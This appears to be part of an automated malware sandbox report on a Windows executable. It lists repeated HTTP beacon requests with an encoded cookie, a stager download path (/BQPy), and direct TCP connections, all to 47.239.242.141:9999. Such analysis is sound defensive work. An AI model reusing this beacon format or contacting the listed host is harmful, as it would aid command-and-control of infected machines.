Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D77AF5 GetTickCount,_malloc,htonl,recvfrom,WSAGetLastError,htonl,ioctlsocket,

0_2_03D77AF5

Source: global traffic	HTTP traffic detected: GET /BQPy HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUSMSNIP)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
